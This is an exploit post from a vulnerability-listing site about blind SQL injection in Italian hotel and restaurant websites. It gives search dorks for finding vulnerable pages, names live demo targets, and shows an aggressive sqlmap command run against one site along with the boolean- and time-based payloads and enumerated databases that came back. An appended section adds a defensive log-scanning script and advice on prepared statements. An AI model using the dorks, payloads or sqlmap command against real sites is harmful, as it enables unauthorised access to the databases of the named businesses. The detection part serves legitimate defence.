Italian Hotels Blind SQL Injection vulnerability

2019.11.30
H9xHacker (SA)
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Italian Hotels Blind SQL Injection vulnerability
# Date: 30/11/2019
# Dork:
inurl:camere-dettaglio.php?id= site:.it
inurl:restaurant-news-detail.php?id= site:.it
inurl:rooms-suites.php?id= site:.it
inurl:room.php?id= site:.it
inurl:rooms-suites.php?id= site:.it
# Exploit Author: H9xHacker
# Tested on: Linux

Reverse check
bing.com ip:151.11.51.124 .php?id=
(There are 202 domains hosted on this server.)

# Demo
ristorantelaspada.it/en/restaurant-news-detail.php?id=32
lungarnovespucci50.com/en/camere-dettaglio.php?id=9
hotelbeyfin.com/de/rooms-suites.php?id=27

# Admin control panel path
http://www.website.com/cms-admin/
OR
http://www.website.it/cms-admin/

# Poc:
sqlmap --level=5 --risk=3 --timeout=10 --threads=10 --random-agent -u 'http://ristorantelaspada.it/en/restaurant-news-detail.php?id=32' --no-cast --batch --dbs

---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=32' AND 2568=2568-- AtOc

    Type: time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP)
    Payload: id=32' OR (SELECT 9574 FROM (SELECT(SLEEP(5)))kdFW)-- xPIg
---
web application technology: Apache, PHP
back-end DBMS: MySQL >= 5.0.12
available databases [2]:
[*] information_schema
[*] ristorantelaspada_it_01

------------------------
Greets:Black Hat Hackers
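
Added example, not part of the original advisory: a log-review check in Python that flags requests to the endpoints listed above whose id parameter is not a plain integer, and labels the two techniques reported in the sqlmap output. The log lines, IP addresses and the names classify/scan are constructed for illustration; an Apache combined-format access log is assumed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Endpoints named in the advisory; each expects an integer `id` GET parameter.
ENDPOINTS = ("camere-dettaglio.php", "restaurant-news-detail.php",
             "rooms-suites.php", "room.php")
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"(?:GET|POST|HEAD) (?P<target>.*?) HTTP/[\d.]+"')
TIME_RE = re.compile(r"\bSLEEP\s*\(", re.I)                      # time-based blind
BOOL_RE = re.compile(r"\b(?:AND|OR)\s+(\d+)\s*=\s*\1\b", re.I)   # e.g. AND 2568=2568

# Constructed sample access log (combined format, documentation IP ranges).
SAMPLE_LOG = [
    '203.0.113.7 - - [30/Nov/2019:10:00:01 +0100] "GET /en/restaurant-news-detail.php?id=32 HTTP/1.1" 200 5120',
    '198.51.100.23 - - [30/Nov/2019:10:02:11 +0100] "GET /en/restaurant-news-detail.php?id=32%27%20AND%202568%3D2568--%20AtOc HTTP/1.1" 200 5120',
    '198.51.100.23 - - [30/Nov/2019:10:02:19 +0100] "GET /de/rooms-suites.php?id=27%27%20OR%20(SELECT%209574%20FROM%20(SELECT(SLEEP(5)))kdFW)--%20xPIg HTTP/1.1" 200 4890',
    '198.51.100.23 - - [30/Nov/2019:10:02:25 +0100] "GET /en/camere-dettaglio.php?id=9%27 HTTP/1.1" 500 312',
    '203.0.113.9 - - [30/Nov/2019:10:03:00 +0100] "GET /index.php?id=abc HTTP/1.1" 200 900',
]

def classify(line):
    """Return (client_ip, path, finding) for a suspicious request, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if not url.path.endswith(ENDPOINTS):
        return None
    # parse_qs percent-decodes the value, so encoded quotes and spaces are visible.
    for value in parse_qs(url.query, keep_blank_values=True).get("id", []):
        if re.fullmatch(r"[0-9]+", value):
            continue  # the only shape a legitimate id takes
        if TIME_RE.search(value):
            kind = "time-based blind"
        elif BOOL_RE.search(value):
            kind = "boolean-based blind"
        else:
            kind = "non-numeric id"
        return (m.group("ip"), url.path, kind)
    return None

def scan(lines):
    """Classify every line and keep only the findings."""
    return [hit for hit in map(classify, lines) if hit]

if __name__ == "__main__":
    for ip, path, kind in scan(SAMPLE_LOG):
        print(f"{ip}  {path}  {kind}")
```

The same integer-only rule belongs in the application itself: validate id as an integer and bind it through a prepared statement rather than concatenating it into the query.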


Copyright 2019, cxsecurity.com